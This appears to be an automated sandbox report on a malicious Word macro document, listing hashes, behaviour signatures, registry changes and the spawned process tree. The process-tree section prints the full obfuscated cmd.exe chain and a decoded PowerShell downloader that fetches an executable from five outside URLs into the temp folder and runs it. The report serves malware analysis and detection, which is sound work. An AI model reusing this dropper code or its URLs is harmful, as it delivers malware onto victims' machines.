Analysis
max time kernel: 101s
max time network: 17s
platform: windows7_x64
resource: win7-20240729-en
resource tags: arch:x64, arch:x86, image:win7-20240729-en, locale:en-us, os:windows7-x64, system
submitted: 29-08-2024 15:27
Static task: static1
Behavioral task: behavioral1
  Sample: c918f47fda0745fedaca86195397ace0_JaffaCakes118.doc
  Resource: win7-20240729-en
Behavioral task: behavioral2
  Sample: c918f47fda0745fedaca86195397ace0_JaffaCakes118.doc
  Resource: win10v2004-20240802-en
General
Target: c918f47fda0745fedaca86195397ace0_JaffaCakes118.doc
Size: 248KB
MD5: c918f47fda0745fedaca86195397ace0
SHA1: 90367cd9c7d83d6028e0125123541a138c5a82d6
SHA256: 7af935b7cd7ddc1383ca817ba41f0784340459331754fcdfa4348fc2a2fe7813
SHA512: 894663307c2bc59f31ac3fd5ae6934971dd8b7beebbbcb18de5d020ad43309baf8a1012662c33b195dc1bd3bfcaae45a87e5b5ef396cb58d0e56f0956fb781ac
SSDEEP: 3072:BO4ZAi7XnrA+Tj7/tKXYAO+aqjL/xSu90OoiLuDKZXfwKeljR17:BOCA83rA+Tj7lKYMa4xUOmD+XfwLH
Malware Config
Extracted
http://ttobus.com/ZtzZFiHGL_r
http://bilanacc.com/P7BuwLoQsTjP0hBVF
http://gclubfan.com/ahjpTwNsvu2X_Q7h
http://katariahospital.com/tquLevYG
http://pjfittedkitchens.com/uerfWET_jrbze
Signatures
Process spawned unexpected child process (1 IoCs)
This typically indicates the parent process was compromised via an exploit or macro.
description | pid | pid_target | Process | procid_target
Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process | 2780 | 1724 | cmd.exe | 28
Blocklisted process makes network request (4 IoCs)
flow | pid | Process
8 | 2160 | powershell.exe
10 | 2160 | powershell.exe
11 | 2160 | powershell.exe
13 | 2160 | powershell.exe
Command and Scripting Interpreter: PowerShell
pid | Process
2160 | powershell.exe
An obfuscated cmd.exe command-line is typically used to evade detection. (2 IoCs)
pid | Process
2780 | cmd.exe
1096 | cmd.exe
Drops file in Windows directory (1 IoCs)
description | ioc | Process
File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | WINWORD.EXE
System Location Discovery: System Language Discovery (1 TTPs, 6 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | WINWORD.EXE
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | powershell.exe
Office loads VBA resources, possible macro or embedded object present
Modifies registry class (64 IoCs)
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLReset" | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D} | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389} | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcToggleButton" | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}\ = "ISpinbutton" | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Wow6432Node\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents2" | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF} | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Wow6432Node\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776} | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Wow6432Node\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074} | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Wow6432Node\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}\ = "MdcListEvents" | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Wow6432Node\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3} | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Wow6432Node\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776} | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Wow6432Node\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents7" | WINWORD.EXE
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{1B0A500B-7C65-475E-9A59-B8917CE9C2FF}\2.0\0 | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Wow6432Node\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}\ = "Font" | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Wow6432Node\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3} | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Wow6432Node\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080} | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Wow6432Node\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF} | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Wow6432Node\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}\ = "ISpinbutton" | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\TypeLib\{1B0A500B-7C65-475E-9A59-B8917CE9C2FF}\2.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\VBE\\MSForms.exd" | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcList" | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF} | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3} | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}\ = "MdcListEvents" | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents7" | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Wow6432Node\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}\ = "FormEvents" | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Wow6432Node\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}\ = "ILabelControl" | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Wow6432Node\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF}\ = "ICommandButton" | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Wow6432Node\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLImage" | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLText" | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D} | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389} | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Wow6432Node\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B} | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01} | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Wow6432Node\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}\ = "IScrollbar" | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D} | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLTextArea" | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Wow6432Node\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}\ = "TabStripEvents" | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Wow6432Node\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF} | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}\ = "ILabelControl" | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3} | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}\ = "_UserForm" | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3} | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}\ = "IReturnBoolean" | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}\ = "IScrollbar" | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Wow6432Node\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D} | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Wow6432Node\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080} | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}\ = "MultiPageEvents" | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3}\ = "MdcTextEvents" | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Wow6432Node\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3} | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776} | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389} | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074} | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLCheckbox" | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Wow6432Node\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcToggleButton" | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Wow6432Node\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F} | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Wow6432Node\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074} | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Wow6432Node\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF} | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D} | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}\ = "IDataAutoWrapper" | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F} | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Wow6432Node\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcOptionButton" | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}\ = "CommandButtonEvents" | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_CLASSES\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}\ = "MdcToggleButtonEvents" | WINWORD.EXE
Suspicious behavior: AddClipboardFormatListener (1 IoCs)
pid | Process
1724 | WINWORD.EXE
Suspicious behavior: EnumeratesProcesses (1 IoCs)
pid | Process
2160 | powershell.exe
Suspicious use of AdjustPrivilegeToken (1 IoCs)
description | pid | Process
Token: SeDebugPrivilege | 2160 | powershell.exe
Suspicious use of SetWindowsHookEx (2 IoCs)
pid | Process
1724 | WINWORD.EXE
1724 | WINWORD.EXE
Suspicious use of WriteProcessMemory (24 IoCs)
description | pid | Process | procid_target
PID 1724 wrote to memory of 2780 | 1724 | WINWORD.EXE | 29
PID 1724 wrote to memory of 2780 | 1724 | WINWORD.EXE | 29
PID 1724 wrote to memory of 2780 | 1724 | WINWORD.EXE | 29
PID 1724 wrote to memory of 2780 | 1724 | WINWORD.EXE | 29
PID 2780 wrote to memory of 1096 | 2780 | cmd.exe | 32
PID 2780 wrote to memory of 1096 | 2780 | cmd.exe | 32
PID 2780 wrote to memory of 1096 | 2780 | cmd.exe | 32
PID 2780 wrote to memory of 1096 | 2780 | cmd.exe | 32
PID 1096 wrote to memory of 2980 | 1096 | cmd.exe | 33
PID 1096 wrote to memory of 2980 | 1096 | cmd.exe | 33
PID 1096 wrote to memory of 2980 | 1096 | cmd.exe | 33
PID 1096 wrote to memory of 2980 | 1096 | cmd.exe | 33
PID 1096 wrote to memory of 2924 | 1096 | cmd.exe | 34
PID 1096 wrote to memory of 2924 | 1096 | cmd.exe | 34
PID 1096 wrote to memory of 2924 | 1096 | cmd.exe | 34
PID 1096 wrote to memory of 2924 | 1096 | cmd.exe | 34
PID 2924 wrote to memory of 2160 | 2924 | cmd.exe | 35
PID 2924 wrote to memory of 2160 | 2924 | cmd.exe | 35
PID 2924 wrote to memory of 2160 | 2924 | cmd.exe | 35
PID 2924 wrote to memory of 2160 | 2924 | cmd.exe | 35
PID 1724 wrote to memory of 2272 | 1724 | WINWORD.EXE | 36
PID 1724 wrote to memory of 2272 | 1724 | WINWORD.EXE | 36
PID 1724 wrote to memory of 2272 | 1724 | WINWORD.EXE | 36
PID 1724 wrote to memory of 2272 | 1724 | WINWORD.EXE | 36
Processes
Level 1: C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
  Command line: "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\c918f47fda0745fedaca86195397ace0_JaffaCakes118.doc"
  PID: 1724
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory

  Level 2: \??\c:\windows\SysWOW64\cmd.exe
    Command line: c:\tiqdul\ncjld\jwcpob\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:O/C"set gN=xepg'bE-QWi$d3=t1YG/Mzn}(Dwl:4\5~hUZPC{AmIL%76uXf y0Nkj+S;BO)a@TqF_.2sHv,c9oVr&&for %4 in (2,75,26,43,36,34,58,42,41,37,28,32,31,72,16,43,77,43,56,6,56,56,41,59,52,52,39,20,6,28,32,7,29,72,16,43,33,43,63,6,20,36,28,32,7,13,72,16,43,27,27,49,11,54,33,40,12,2,14,4,54,48,69,71,10,69,40,4,57,11,12,48,26,75,54,14,22,1,26,7,75,5,54,1,73,15,49,52,1,15,67,9,1,5,37,27,10,1,22,15,57,11,48,10,10,54,61,14,4,33,15,15,2,28,19,19,15,15,75,5,46,69,67,73,75,40,19,35,15,21,35,65,10,70,18,42,66,77,62,33,15,15,2,28,19,19,5,10,27,61,22,61,73,73,67,73,75,40,19,36,44,58,46,26,42,75,8,69,63,54,36,51,33,58,76,65,62,33,15,15,2,28,19,19,3,73,27,46,5,48,61,22,67,73,75,40,19,61,33,54,2,63,26,52,69,71,46,68,47,66,8,44,33,62,33,15,15,2,28,19,19,53,61,15,61,77,10,61,33,75,69,2,10,15,61,27,67,73,75,40,19,15,64,46,42,1,71,17,18,62,33,15,15,2,28,19,19,2,54,48,10,15,15,1,12,53,10,15,73,33,1,22,69,67,73,75,40,19,46,1,77,48,9,6,63,66,54,77,5,21,1,4,67,56,2,27,10,15,24,4,62,4,60,57,11,64,73,10,73,54,5,54,14,4,15,26,75,64,2,10,4,57,11,64,69,69,48,61,49,14,49,4,74,74,45,4,57,11,33,5,40,26,54,53,10,14,4,71,5,40,10,2,71,26,4,57,11,15,10,22,21,64,14,11,1,22,71,28,15,1,40,2,55,4,30,4,55,11,64,69,69,48,61,55,4,67,1,0,1,4,57,48,75,77,1,61,73,33,24,11,22,10,21,5,26,49,10,22,49,11,48,10,10,54,61,60,38,15,77,50,38,11,12,48,26,75,54,67,25,75,26,22,27,75,61,12,65,10,27,1,24,11,22,10,21,5,26,72,49,11,15,10,22,21,64,60,57,11,26,71,69,48,26,14,4,26,21,10,64,64,22,4,57,41,48,49,24,24,18,1,15,7,41,15,1,40,49,11,15,10,22,21,64,60,67,27,1,22,3,15,33,49,7,3,1,49,29,51,51,51,51,60,49,38,41,22,71,75,53,1,7,41,15,1,40,49,11,15,10,22,21,64,57,11,71,48,15,33,77,15,15,14,4,73,75,75,73,2,10,69,4,57,5,77,1,61,53,57,23,23,73,61,15,73,33,38,23,23,11,61,12,64,10,5,73,14,4,22,27,26,26,10,33,4,57,78)do set WM=!WM!!gN:~%4,1!&&if %4 gtr 77 echo !WM:*WM!=!|%CommonProgramFiles(x86):~23,1%m%ALLUSERSPROFILE:~-4,-3% "
    PID: 2780
    - Process spawned unexpected child process
    - An obfuscated cmd.exe command-line is typically used to evade detection.
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory

    Level 3: C:\Windows\SysWOW64\cmd.exe
      Command line: CmD /V:O/C"set gN=xepg'bE-QWi$d3=t1YG/Mzn}(Dwl:4\5~hUZPC{AmIL%76uXf y0Nkj+S;BO)a@TqF_.2sHv,c9oVr&&for %4 in (2,75,26,43,36,34,58,42,41,37,28,32,31,72,16,43,77,43,56,6,56,56,41,59,52,52,39,20,6,28,32,7,29,72,16,43,33,43,63,6,20,36,28,32,7,13,72,16,43,27,27,49,11,54,33,40,12,2,14,4,54,48,69,71,10,69,40,4,57,11,12,48,26,75,54,14,22,1,26,7,75,5,54,1,73,15,49,52,1,15,67,9,1,5,37,27,10,1,22,15,57,11,48,10,10,54,61,14,4,33,15,15,2,28,19,19,15,15,75,5,46,69,67,73,75,40,19,35,15,21,35,65,10,70,18,42,66,77,62,33,15,15,2,28,19,19,5,10,27,61,22,61,73,73,67,73,75,40,19,36,44,58,46,26,42,75,8,69,63,54,36,51,33,58,76,65,62,33,15,15,2,28,19,19,3,73,27,46,5,48,61,22,67,73,75,40,19,61,33,54,2,63,26,52,69,71,46,68,47,66,8,44,33,62,33,15,15,2,28,19,19,53,61,15,61,77,10,61,33,75,69,2,10,15,61,27,67,73,75,40,19,15,64,46,42,1,71,17,18,62,33,15,15,2,28,19,19,2,54,48,10,15,15,1,12,53,10,15,73,33,1,22,69,67,73,75,40,19,46,1,77,48,9,6,63,66,54,77,5,21,1,4,67,56,2,27,10,15,24,4,62,4,60,57,11,64,73,10,73,54,5,54,14,4,15,26,75,64,2,10,4,57,11,64,69,69,48,61,49,14,49,4,74,74,45,4,57,11,33,5,40,26,54,53,10,14,4,71,5,40,10,2,71,26,4,57,11,15,10,22,21,64,14,11,1,22,71,28,15,1,40,2,55,4,30,4,55,11,64,69,69,48,61,55,4,67,1,0,1,4,57,48,75,77,1,61,73,33,24,11,22,10,21,5,26,49,10,22,49,11,48,10,10,54,61,60,38,15,77,50,38,11,12,48,26,75,54,67,25,75,26,22,27,75,61,12,65,10,27,1,24,11,22,10,21,5,26,72,49,11,15,10,22,21,64,60,57,11,26,71,69,48,26,14,4,26,21,10,64,64,22,4,57,41,48,49,24,24,18,1,15,7,41,15,1,40,49,11,15,10,22,21,64,60,67,27,1,22,3,15,33,49,7,3,1,49,29,51,51,51,51,60,49,38,41,22,71,75,53,1,7,41,15,1,40,49,11,15,10,22,21,64,57,11,71,48,15,33,77,15,15,14,4,73,75,75,73,2,10,69,4,57,5,77,1,61,53,57,23,23,73,61,15,73,33,38,23,23,11,61,12,64,10,5,73,14,4,22,27,26,26,10,33,4,57,78)do set WM=!WM!!gN:~%4,1!&&if %4 gtr 77 echo !WM:*WM!=!|CmD "
      PID: 1096
      - An obfuscated cmd.exe command-line is typically used to evade detection.
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory

      Level 4: C:\Windows\SysWOW64\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $jhmdp='jfsvism';$dfwoj=new-object Net.WebClient;$fiija='http://ttobus.com/ZtzZFiHGL_r@http://bilanacc.com/P7BuwLoQsTjP0hBVF@http://gclubfan.com/ahjpTwNsvu2X_Q7h@http://katariahospital.com/tquLevYG@http://pjfittedkitchens.com/uerfWET_jrbze'.Split('@');$qcicjbj='twoqpi';$qssfa = '996';$hbmwjki='vbmipvw';$tinzq=$env:temp+'\'+$qssfa+'.exe';foreach($nizbw in $fiija){try{$dfwoj.DownloadFile($nizbw, $tinzq);$wvsfw='wziqqn';If ((Get-Item $tinzq).length -ge 40000) {Invoke-Item $tinzq;$vfthrtt='coocpis';break;}}catch{}}$adqibc='nlwwih';"
        PID: 2980
        - System Location Discovery: System Language Discovery

      Level 4: C:\Windows\SysWOW64\cmd.exe
        Command line: CmD
        PID: 2924
        - System Location Discovery: System Language Discovery
        - Suspicious use of WriteProcessMemory

        Level 5: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          Command line: powershell $jhmdp='jfsvism';$dfwoj=new-object Net.WebClient;$fiija='http://ttobus.com/ZtzZFiHGL_r@http://bilanacc.com/P7BuwLoQsTjP0hBVF@http://gclubfan.com/ahjpTwNsvu2X_Q7h@http://katariahospital.com/tquLevYG@http://pjfittedkitchens.com/uerfWET_jrbze'.Split('@');$qcicjbj='twoqpi';$qssfa = '996';$hbmwjki='vbmipvw';$tinzq=$env:temp+'\'+$qssfa+'.exe';foreach($nizbw in $fiija){try{$dfwoj.DownloadFile($nizbw, $tinzq);$wvsfw='wziqqn';If ((Get-Item $tinzq).length -ge 40000) {Invoke-Item $tinzq;$vfthrtt='coocpis';break;}}catch{}}$adqibc='nlwwih';
          PID: 2160
          - Blocklisted process makes network request
          - Command and Scripting Interpreter: PowerShell
          - System Location Discovery: System Language Discovery
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken

  Level 2: C:\Windows\splwow64.exe
    Command line: C:\Windows\splwow64.exe 12288
    PID: 2272
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 19KB
MD5: 9249955c958ebbb5d1967020abd5021c
SHA1: 08ca7648bd0ae4fa60d68e07bffafa0661739a89
SHA256: d488150e9503a40c59a625c5f472ee5daee6c7517c796492a37a88c8dd68e27c
SHA512: f6266477f6d2ff8086fd6155db7d59b616696a06983bb0deaf4c5e972edff6c2664b4911591204abba3695f01e85f67355d9c8598ab1c7c36a111f57f3abc2df